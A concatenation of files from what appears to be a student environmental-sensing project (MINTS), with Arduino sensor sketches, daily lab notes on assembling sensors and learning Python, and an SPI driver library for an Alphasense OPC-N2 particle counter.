Serial.print("invalid");
}
Serial.println(" ppm\n");
}
delay(1000);
Serial.println("---");
}
<file_sep># Image Processing Tutorial
## Ex 1 Reading an Image
<file_sep># Daily Notes
## 06/24/2019 Monday
### 1.1 Learned how to assemble the Shinyei with soldering and wiring
#### 1.1.1 The frayed wires are a pain </br>
#### 1.1.2 Adam discovered that by seprating the wires attached to the load so that they go to both of the sensors simultaneously (as
oppose to being wired in parallel), accident rate (breaking solder) was cut down in addition to manufacturing time </br>
### 1.2 Watched one Shinyei be put together (by Adam) </br>
### 1.3 Helped Adam manufacture 3 Shinyeis (I did more of the soldering while he did more of the wiring) </br>
## 06/25/2019 Tuesday
### 1.1 Created Arduino accaount </br>
#### 1.1.1 Ardiono Username: norad42; email: <EMAIL>; password: <PASSWORD>:: </br>
#### 1.1.2 Github Username: norad02; email: <EMAIL>; password: <PASSWORD>:: </br>
### 2.1 Ran Lakitha's second Github exercise </br>
#### 2.1.1
```
// the setup routine runs once when you press reset:
void setup() {
// initialize serial communication at 9600 bits per second:
Serial.begin(9600);
}
// the loop routine runs over and over again forever:
void loop() {
// print out a String of your choice
Serial.println("Hello MINTS: Multi-scale Integrated Sensing and Simulation");
// Delay for 1000 miliseconds
delay(1000); // delay in between reads for stability
}
3.1 Ran Likitha's third Github exercise
3.1.1 void setup() {
// initialize digital pin LED_BUILTIN as an output.
pinMode(LED_BUILTIN, OUTPUT);
}
// the loop function runs over and over again forever
void loop() {
digitalWrite(LED_BUILTIN, HIGH); // turn the LED on (HIGH is the voltage level)
delay(1000); // wait for a second
digitalWrite(LED_BUILTIN, LOW); // turn the LED off by making the voltage LOW
delay(1000); // wait for a second
}
```
### 4.1 Downloaded the Arduino app on my computer </br>
### 5.1 Download Atom and the PlatformIO </br>
#### 5.1.1 Code for the CO2 & Temperature & Humidity Sensor (SCD30) </br>
```
#include <Arduino.h>
#include <Wire.h>
#include "SparkFun_SCD30_Arduino_Library.h"
SCD30 airSensor;
void setup()
{
Wire.begin();
Serial.begin(9600);
Serial.println("SCD30 Example");
airSensor.begin(); //This will cause readings to occur every two seconds
}
void loop()
{
if (airSensor.dataAvailable())
{
Serial.print("co2(ppm):");
Serial.print(airSensor.getCO2());
Serial.print(" temp(C):");
Serial.print(airSensor.getTemperature(), 1);
Serial.print(" humidity(%):");
Serial.print(airSensor.getHumidity(), 1);
Serial.println();
}
else
Serial.println("No data");
delay(1000);
}
```
#### 5.1.2 Code for the Barometer Sensor (BME280) </br>
```
#include <Arduino.h>
#include "Seeed_BME280.h"
#include <Wire.h>
BME280 bme280;
void setup()
{
Serial.begin(9600);
if(!bme280.init()){
Serial.println("Device error!");
}
}
void loop()
{
float pressure;
//get and print temperatures
Serial.print("Temp: ");
Serial.print(bme280.getTemperature());
Serial.println("C");//The unit for Celsius because original arduino don't support speical symbols
//get and print atmospheric pressure data
Serial.print("Pressure: ");
Serial.print(pressure = bme280.getPressure());
Serial.println("Pa");
//get and print altitude data
Serial.print("Altitude: ");
Serial.print(bme280.calcAltitude(pressure));
Serial.println("m");
//get and print humidity data
Serial.print("Humidity: ");
Serial.print(bme280.getHumidity());
Serial.println("%");
delay(1000);
}
```
####5.1.3 Code for the Sunlight Sensor </br>
```
#include <Wire.h>
#include "Arduino.h"
#include "SI114X.h"
SI114X SI1145 = SI114X();
void setup() {
Serial.begin(9600);
Serial.println("Beginning Si1145!");
while (!SI1145.Begin()) {
Serial.println("Si1145 is not ready!");
delay(1000);
}
Serial.println("Si1145 is ready!");
}
void loop() {
Serial.print("//--------------------------------------//\r\n");
Serial.print("Vis: "); Serial.println(SI1145.ReadVisible());
Serial.print("IR: "); Serial.println(SI1145.ReadIR());
//the real UV value must be div 100 from the reg value , datasheet for more information.
Serial.print("UV: "); Serial.println((float)SI1145.ReadUV()/100);
delay(1000);
}
```
####5.1.4 The library for the Light & Gesture & Color & Proximity Sensor is nowhere to be found on Atom/PlatformIO </br>
#####5.1.4.1 Imbar says that Lakitha will show us later </br>
###6.1 The Github that I downloaded onto my Windows refused to run </br>
## 07/09/2019 Tuesday </br>
### 1.1 I am learning Python </br>
```
a = 5
b = 6
print(9 * a + b)
```
#### This prints 51
##### This is how you run code:
```
C:\Users\norad\Desktop\Python-lesson>python lesson1.py
```
##### This site: https://www.programiz.com/python-programming/tutorial has a lot of helpful information on it.
## 07/30/2019 Monday </br>
### 1.1 I am learning Python </br>
### It's a learning curve </br>
### I am learning how to upload a picture (in both color and grayscale) </br>
### I started to learn how to use RGB to design my own picture </br>
<file_sep>#ifndef OPCN2_NANO_MINTS_H
#define OPCN2_NANO_MINTS_H
#include <Arduino.h>
#include <SPI.h>
class OPCN2NanoMints
{
private:
// attributes
uint8_t alphaSlavePin;
public:
OPCN2NanoMints(uint8_t chipSelect);
// Alpha Sensor Functions
void begin();
bool initialize();
void beginTransfer();
void endTransfer();
void printBytesRead(byte initial[],byte dataIn[], int sizeOfArray) ;
struct fanAndLaserStatus setFanAndLaserStatus(bool status);
struct fanStatus setFanStatus(bool status);
struct laserStatus setLaserStatus(bool status);
struct laserPower setLaserPower(byte laserPower);
struct fanPower setFanPower(byte fanPower);
struct digitalPotStatus readDigitalPotStatus();
struct informationString readInformationString();
struct serialNumber readSerialNumber();
struct firmwareVersion readFirmwareVersion();
// There are two
void readConfigurationVariables();
void readConfigurationVariables2();
struct histogramData readHistogramData() ;
struct pmData readPMData() ;
void printMintsBegin();
void printMintsEnd();
bool comparator(byte arrayOne[], byte arraTwo[], int size);
};
struct fanAndLaserStatus
{
bool fanAndLaserOn;
bool valid;
};
struct fanStatus
{
bool fanOn;
bool valid;
};
struct laserStatus
{
bool laserOn;
bool valid;
};
struct fanPower
{
uint8_t fanPower;
bool valid;
};
struct laserPower
{
uint8_t laserPower;
bool valid;
};
struct digitalPotStatus
{
uint8_t fanOn;
uint8_t laserOn;
uint8_t fanDACVal;
uint8_t laserDACVal;
bool valid;
};
struct informationString
{
String information;
bool valid;
};
struct serialNumber
{
String serial;
bool valid;
};
struct firmwareVersion
{
uint8_t major;
uint8_t minor;
bool valid;
};
//
// struct configurationVariables
// {
//
// uint16_t binBoundries0;
// uint16_t binBoundries1;
// uint16_t binBoundries2;
// uint16_t binBoundries3;
// uint16_t binBoundries4;
// uint16_t binBoundries5;
// uint16_t binBoundries6;
// uint16_t binBoundries7;
// uint16_t binBoundries8;
// uint16_t binBoundries9;
// uint16_t binBoundries10;
// uint16_t binBoundries11;
// uint16_t binBoundries12;
// uint16_t binBoundries13;
// uint16_t binBoundries14;
//
// uint16_t binBoundriesSpare;
//
// float binParticleVolume0;
// float binParticleVolume1;
// float binParticleVolume2;
// float binParticleVolume3;
// float binParticleVolume4;
// float binParticleVolume5;
// float binParticleVolume6;
// float binParticleVolume7;
// float binParticleVolume8;
// float binParticleVolume9;
// float binParticleVolume10;
// float binParticleVolume11;
// float binParticleVolume12;
// float binParticleVolume13;
// float binParticleVolume14;
// float binParticleVolume15;
//
// float binParticleDensity0;
// float binParticleDensity1;
// float binParticleDensity2;
// float binParticleDensity3;
// float binParticleDensity4;
// float binParticleDensity5;
// float binParticleDensity6;
// float binParticleDensity7;
// float binParticleDensity8;
// float binParticleDensity9;
// float binParticleDensity10;
// float binParticleDensity11;
// float binParticleDensity12;
// float binParticleDensity13;
// float binParticleDensity14;
// float binParticleDensity15;
//
// float binSampleVolumeWeight0;
// float binSampleVolumeWeight1;
// float binSampleVolumeWeight2;
// float binSampleVolumeWeight3;
// float binSampleVolumeWeight4;
// float binSampleVolumeWeight5;
// float binSampleVolumeWeight6;
// float binSampleVolumeWeight7;
// float binSampleVolumeWeight8;
// float binSampleVolumeWeight9;
// float binSampleVolumeWeight10;
// float binSampleVolumeWeight11;
// float binSampleVolumeWeight12;
// float binSampleVolumeWeight13;
// float binSampleVolumeWeight14;
// float binSampleVolumeWeight15;
//
// float gainScalingCoefficient;
// float sampleFlowRate;
//
// uint8_t laserDACVal;
// uint8_t fanDACVal;
// uint8_t tofToSfrFactor;
//
// uint8_t spare0;
// uint8_t spare1;
// uint8_t spare2;
// uint8_t spare3;
// uint8_t spare4;
// uint8_t spare5;
// uint8_t spare6;
// uint8_t spare7;
// uint8_t spare8;
// uint8_t spare9;
// uint8_t spare10;
// uint8_t spare11;
// uint8_t spare12;
// uint8_t spare13;
// uint8_t spare14;
// uint8_t spare15;
// uint8_t spare16;
// uint8_t spare17;
// uint8_t spare18;
// uint8_t spare19;
// uint8_t spare20;
//
// bool valid;
// };
//
//
// struct configurationVariables2
// {
//
// uint16_t AMSamplingIntervalCount;
// uint16_t AMIdleIntervalCount;
// uint8_t AMFanOnInIdle;
// uint8_t AMLaserOnInIdle;
// uint16_t AMMaxDataArraysInFile;
// uint8_t AMOnlySavePMData;
//
// bool valid;
// };
struct histogramData
{
uint16_t binCount0 ;
uint16_t binCount1 ;
uint16_t binCount2 ;
uint16_t binCount3 ;
uint16_t binCount4 ;
uint16_t binCount5 ;
uint16_t binCount6 ;
uint16_t binCount7 ;
uint16_t binCount8 ;
uint16_t binCount9 ;
uint16_t binCount10 ;
uint16_t binCount11 ;
uint16_t binCount12 ;
uint16_t binCount13 ;
uint16_t binCount14 ;
uint16_t binCount15 ;
uint8_t bin1TimeToCross ;
uint8_t bin3TimeToCross ;
uint8_t bin5TimeToCross ;
uint8_t bin7TimeToCross ;
float sampleFlowRate ;
uint32_t temperatureOrPressure ;
float samplingPeriod ;
uint16_t checkSum ;
float pm1 ;
float pm2_5 ;
float pm10 ;
bool valid;
};
struct pmData
{
float pm1 ;
float pm2_5 ;
float pm10 ;
bool valid;
};
#endif
<file_sep>/***************************************************************************
OPCN2NanoMints
---------------------------------
Written by: <NAME>
- for -
Mints: Multi-scale Integrated Sensing and Simulation
---------------------------------
Date: April 19th, 2019
---------------------------------
This library is written for the Alphasense OPCN2 optical particle counter.
----------------> http://www.alphasense.com/WEB1213/wp-content/uploads/2018/02/OPC-N3.pdf
--------------------------------------------------------------------------
https://github.com/mi3nts
http://utdmints.info/
***************************************************************************/
#include "OPCN2NanoMints.h"
#include <Arduino.h>
#include <SPI.h>
/***************************************************************************
PRIVATE FUNCTIONS
***************************************************************************/
OPCN2NanoMints::OPCN2NanoMints(uint8_t chipSelect){
alphaSlavePin = chipSelect;
}
// Alpha Sensor Functions
void OPCN2NanoMints::begin()
{
printMintsBegin();
Serial.println("Initiating SPI ");
SPI.begin();
SPI.setBitOrder(MSBFIRST);
delay(1000);
pinMode(alphaSlavePin,OUTPUT);
digitalWrite(alphaSlavePin,HIGH);
SPI.setDataMode(SPI_MODE1);
SPI.setClockDivider(SPI_CLOCK_DIV32);
delay(400);
Serial.println("---------------------------- ");
printMintsEnd();
}
bool OPCN2NanoMints::initialize(){
delay(1000);
begin();
delay(1000);
readDigitalPotStatus();
delay(1000);
readInformationString();
delay(1000);
readSerialNumber();
delay(1000);
readFirmwareVersion();
delay(1000);
readConfigurationVariables();
delay(1000);
readConfigurationVariables2();
delay(1000);
struct fanAndLaserStatus fanAndLaserState = setFanAndLaserStatus(true);
delay(10000);
struct digitalPotStatus digitalPotState = readDigitalPotStatus();
readPMData() ;
return (fanAndLaserState.valid&&fanAndLaserState.fanAndLaserOn)&&(digitalPotState.fanOn&&digitalPotState.laserOn);
}
struct fanAndLaserStatus OPCN2NanoMints::setFanAndLaserStatus(bool status){
printMintsBegin();
Serial.println("Setting Fan and Laser Status");
int size = 1;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X03;;
if(status){
Serial.println("Turning Fan and Laser On");
beginTransfer();
initial = SPI.transfer(inputByte);
delay(10);
dataIn[0] = SPI.transfer(0X00);
endTransfer();
}else{
Serial.println("Turning Fan and Laser Off");
beginTransfer();
initial = SPI.transfer(inputByte);
delay(10);
dataIn[0] = SPI.transfer(0X01);
endTransfer();
}
printBytesRead(initial,dataIn,size);
fanAndLaserStatus dataOutput;
dataOutput.valid = comparator(validator, initial,1);
dataOutput.fanAndLaserOn = status;
Serial.print("Validity: ");
Serial.println(dataOutput.valid);
Serial.print(dataOutput.fanAndLaserOn); Serial.print(" ");
printMintsEnd();
return dataOutput;
}
struct fanStatus OPCN2NanoMints::setFanStatus(bool status) {
printMintsBegin();
Serial.println("Setting Fan Status");
int size = 1;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X03;;
if(status){
Serial.println("Turning Fan On");
beginTransfer();
initial = SPI.transfer(inputByte);
delay(10);
dataIn[0] = SPI.transfer(0X04);
endTransfer();
}else{
Serial.println("Turning Fan Off");
beginTransfer();
initial = SPI.transfer(inputByte);
delay(10);
dataIn[0] = SPI.transfer(0X05);
endTransfer();
}
printBytesRead(initial,dataIn,size);
fanStatus dataOutput;
dataOutput.valid = comparator(validator, initial,1);
dataOutput.fanOn = status;
Serial.print("Validity: ");
Serial.println(dataOutput.valid);
Serial.print(dataOutput.fanOn); Serial.print(" ");
printMintsEnd();
delay(1000);
return dataOutput;
}
struct laserStatus OPCN2NanoMints::setLaserStatus(bool status){
printMintsBegin();
Serial.println("Setting Laser Status");
int size = 1;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X03;;
if(status){
Serial.println("Turning Laser On");
beginTransfer();
initial = SPI.transfer(inputByte);
delay(10);
dataIn[0] = SPI.transfer(0X02);
endTransfer();
}else{
Serial.println("Turning Laser Off");
beginTransfer();
initial = SPI.transfer(inputByte);
delay(10);
dataIn[0] = SPI.transfer(0X03);
endTransfer();
}
printBytesRead(initial,dataIn,size);
laserStatus dataOutput;
dataOutput.valid = comparator(validator, initial,1);
dataOutput.laserOn = status;
Serial.print("Validity: ");
Serial.println(dataOutput.valid);
Serial.print(dataOutput.laserOn); Serial.print(" ");
printMintsEnd();
delay(1000);
return dataOutput;
}
struct digitalPotStatus OPCN2NanoMints::readDigitalPotStatus() {
printMintsBegin();
Serial.println("Reading Digital Pot Status");
int size = 4;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X13;;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
digitalPotStatus dataOutput;
memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
dataOutput.valid = comparator(validator, initial,1);
Serial.print("Validity: ");
Serial.println(dataOutput.valid);
Serial.print(dataOutput.fanOn); Serial.print(" ");
Serial.print(dataOutput.laserOn); Serial.print(" ");
Serial.print(dataOutput.fanDACVal ); Serial.print(" ");
Serial.print(dataOutput.laserDACVal); Serial.print(" ");
printMintsEnd();
delay(1000);
return dataOutput;
}
struct informationString OPCN2NanoMints::readInformationString() {
printMintsBegin();
Serial.println("Reading information String");
int size = 60;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X3F;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
String info = "";
for (int i = 0; i<size ; i++){
info += String((char)dataIn[i]);
}
informationString dataOutput;
dataOutput.valid = comparator(validator, initial,1);
dataOutput.information = info;
Serial.print("Validity: ");
Serial.print(dataOutput.valid) ; Serial.println(" ");
Serial.print(dataOutput.information); Serial.print(" ");
printMintsEnd();
delay(1000);
return dataOutput;
}
struct serialNumber OPCN2NanoMints::readSerialNumber() {
printMintsBegin();
Serial.println("Reading Serial Number");
int size = 60;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X10;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
String info = "";
for (int i = 0; i < size; i++){
info += String((char)dataIn[i]);
}
serialNumber dataOutput;
dataOutput.valid = comparator(validator, initial,1);
dataOutput.serial = info;
//
Serial.print("Validity: ");
Serial.print(dataOutput.valid) ; Serial.println(" ");
Serial.print(dataOutput.serial); Serial.print(" ");
printMintsEnd();
delay(1000);
return dataOutput;
}
struct firmwareVersion OPCN2NanoMints::readFirmwareVersion() {
printMintsBegin();
Serial.println("Reading Firmware Version ");
int size = 2;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X12;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
firmwareVersion dataOutput;
memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
dataOutput.valid = comparator(validator, initial,1);
Serial.print("Validity: ");
Serial.print(dataOutput.valid) ; Serial.println(" ");
Serial.print(dataOutput.major); Serial.print(" ");
Serial.print(dataOutput.minor); Serial.print(" ");
printMintsEnd();
delay(1000);
return dataOutput;
}
void OPCN2NanoMints::readConfigurationVariables() {
printMintsBegin();
Serial.println("Reading Configeration Varibles ");
int size = 256;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X3C;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
//
// configurationVariables dataOutput;
// memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
// dataOutput.valid = comparator(validator, initial,1);
//
// Serial.print("Validity: ");
// Serial.println(dataOutput.valid);
// Serial.println("Bin Boundries");
// Serial.print(dataOutput.binBoundries0);Serial.print(" ");
// Serial.print(dataOutput.binBoundries1);Serial.print(" ");
// Serial.print(dataOutput.binBoundries2);Serial.print(" ");
// Serial.print(dataOutput.binBoundries3);Serial.print(" ");
// Serial.print(dataOutput.binBoundries4);Serial.print(" ");
// Serial.print(dataOutput.binBoundries5);Serial.print(" ");
// Serial.print(dataOutput.binBoundries6);Serial.print(" ");
// Serial.print(dataOutput.binBoundries7);Serial.print(" ");
// Serial.print(dataOutput.binBoundries8);Serial.print(" ");
// Serial.print(dataOutput.binBoundries9);Serial.println(" ");
// Serial.print(dataOutput.binBoundries10);Serial.print(" ");
// Serial.print(dataOutput.binBoundries11);Serial.print(" ");
// Serial.print(dataOutput.binBoundries12);Serial.print(" ");
// Serial.print(dataOutput.binBoundries13);Serial.print(" ");
// Serial.print(dataOutput.binBoundries14);Serial.print(" ");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Boundries Spare");
// Serial.print(dataOutput.binBoundriesSpare);Serial.print(" ");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Particle Volumes");
// Serial.print(dataOutput.binParticleVolume0);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume1);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume2);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume3);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume4);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume5);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume6);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume7);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume8);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume9);Serial.println(" ");
// Serial.print(dataOutput.binParticleVolume10);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume11);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume12);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume13);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume14);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume15);Serial.print(" ");
// Serial.println("");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Particle Densities");
// Serial.print(dataOutput.binParticleDensity0);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity1);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity2);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity3);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity4);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity5);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity6);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity7);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity8);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity9);Serial.println(" ");
// Serial.print(dataOutput.binParticleDensity10);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity11);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity12);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity13);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity14);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity15);Serial.print(" ");
//
//
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Sample Volume Weights ");
// Serial.print(dataOutput.binSampleVolumeWeight0);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight1);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight2);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight3);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight4);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight5);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight6);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight7);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight8);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight9);Serial.println(" ");
// Serial.print(dataOutput.binSampleVolumeWeight10);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight11);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight12);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight13);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight14);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight15);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Gain Scaling Coefficient");
// Serial.print(dataOutput.gainScalingCoefficient);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Sample Flow Rate");
// Serial.print(dataOutput.sampleFlowRate);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Laser DAC Val");
// Serial.print(dataOutput.laserDACVal);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Fan DAC Val");
// Serial.print(dataOutput.fanDACVal);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Time of Flight to Sample Flow Rate conversion factor");
// Serial.print(dataOutput.tofToSfrFactor);Serial.print(" ");
//
// printMintsEnd();
delay(1000);
// return dataOutput;
}
void OPCN2NanoMints::readConfigurationVariables2() {
printMintsBegin();
Serial.println("Reading Configeration Varibles 2");
int size = 9;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X3D;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
// configurationVariables2 dataOutput;
// memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
// dataOutput.valid = comparator(validator, initial,1);
//
// Serial.print("Validity: ");
// Serial.println(dataOutput.valid);
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Sampling Interval Count");
// Serial.print(dataOutput.AMSamplingIntervalCount);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Idle Interval Count");
// Serial.print(dataOutput.AMIdleIntervalCount);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Fan On In Idle");
// Serial.print(dataOutput.AMFanOnInIdle);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Laser On In Idle");
// Serial.print(dataOutput.AMLaserOnInIdle);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Max Data Arrays InFile");
// Serial.print(dataOutput.AMMaxDataArraysInFile);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Only Save PM Data");
// Serial.print(dataOutput.AMOnlySavePMData);Serial.print(" ");
//
// printMintsEnd();
delay(1000);
// return dataOutput;
}
struct histogramData OPCN2NanoMints::readHistogramData() {
// printMintsBegin();
// Serial.println("Reading Histogram Data");
int size = 62;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X30;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
// printBytesRead(initial,dataIn,size);
histogramData dataOutput;
memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
dataOutput.valid = comparator(validator, initial,1);
//
// Serial.print("Validity: ");
// Serial.println(dataOutput.valid);
// Serial.println("Bin Counts");
// Serial.print(dataOutput.binCount0);Serial.print(" ");
// Serial.print(dataOutput.binCount1);Serial.print(" ");
// Serial.print(dataOutput.binCount2);Serial.print(" ");
// Serial.print(dataOutput.binCount3);Serial.print(" ");
// Serial.print(dataOutput.binCount4);Serial.print(" ");
// Serial.print(dataOutput.binCount5);Serial.print(" ");
// Serial.print(dataOutput.binCount6);Serial.print(" ");
// Serial.print(dataOutput.binCount7);Serial.print(" ");
// Serial.print(dataOutput.binCount8);Serial.print(" ");
// Serial.print(dataOutput.binCount9);Serial.println(" ");
// Serial.print(dataOutput.binCount10);Serial.print(" ");
// Serial.print(dataOutput.binCount11);Serial.print(" ");
// Serial.print(dataOutput.binCount12);Serial.print(" ");
// Serial.print(dataOutput.binCount13);Serial.print(" ");
// Serial.print(dataOutput.binCount14);Serial.print(" ");
// Serial.print(dataOutput.binCount15);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Time To Cross");
// Serial.print(dataOutput.bin1TimeToCross);Serial.print(" ");
// Serial.print(dataOutput.bin3TimeToCross);Serial.print(" ");
// Serial.print(dataOutput.bin5TimeToCross);Serial.print(" ");
// Serial.print(dataOutput.bin7TimeToCross);Serial.println(" ");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Sample Flow Rate");
// Serial.println(dataOutput.sampleFlowRate);
// Serial.println("-------------------------------------------------");
// Serial.println("Temperature Or Pressure");
// Serial.println(dataOutput.temperatureOrPressure);
// Serial.println("-------------------------------------------------");
// Serial.println("Sampling Period");
// Serial.println(dataOutput.samplingPeriod);
// Serial.println("-------------------------------------------------");
// Serial.println("Check Sum");
// Serial.println(dataOutput.checkSum);
// Serial.println("-------------------------------------------------");
// Serial.println("pm1");
// Serial.println(dataOutput.pm1);
// Serial.println("-------------------------------------------------");
// Serial.println("pm2.5");
// Serial.println(dataOutput.pm2_5);
// Serial.println("-------------------------------------------------");
// Serial.println("pm10");
// Serial.println(dataOutput.pm10);
// Serial.println("-------------------------------------------------");
//
// printMintsEnd();
return dataOutput;
}
struct pmData OPCN2NanoMints::readPMData() {
printMintsBegin();
Serial.println("Reading Pm Data");
int size = 12;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X32;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
pmData dataOutput;
memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
dataOutput.valid = comparator(validator, initial,1);
Serial.print("Validity: ");
Serial.println(dataOutput.valid);
Serial.println("-------------------------------------------------");
Serial.println("pm1");
Serial.println(dataOutput.pm1);
Serial.println("-------------------------------------------------");
Serial.println("pm2.5");
Serial.println(dataOutput.pm2_5);
Serial.println("-------------------------------------------------");
Serial.println("pm10");
Serial.println(dataOutput.pm10);
printMintsEnd();
return dataOutput;
}
bool OPCN2NanoMints::comparator(byte arrayOne[], byte arrayTwo[], int size)
{
bool valid = true;
for (int i = 0; i < size; i++){
if (arrayOne[i] != arrayTwo[i])
{
valid = false;
}
}
return valid;
}
void OPCN2NanoMints::beginTransfer() {
digitalWrite(alphaSlavePin, LOW);
delay(1);
}
void OPCN2NanoMints::endTransfer() {
delay(1);
digitalWrite(alphaSlavePin, HIGH);
}
void OPCN2NanoMints::printBytesRead(byte initial[], byte dataIn[], int sizeOfArray)
{
Serial.println("--------------------------------");
Serial.println("Printing Initial Bytes----------");
Serial.print(initial[0],HEX);
Serial.print(" ");
Serial.println("--------------------------------");
Serial.println("Printing Byte Array-------------");
for (int i = 0 ; i<sizeOfArray; i++)
{
Serial.print(dataIn[i],HEX);
Serial.print(" ");
if(i%10==9)
{
Serial.println("");
}
}
Serial.println("");
Serial.println("--------------------------------");
}
void OPCN2NanoMints::printMintsBegin(){
Serial.println("");
Serial.println("--------------------------------");
Serial.println("-------------MINTS--------------");
}
void OPCN2NanoMints::printMintsEnd(){
Serial.println("");
Serial.println("-------------MINTS--------------");
Serial.println("--------------------------------");
}
<file_sep>/*
Written by <NAME>
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
int proximity_status = 0;
void setup()
{
Serial.begin(9600);
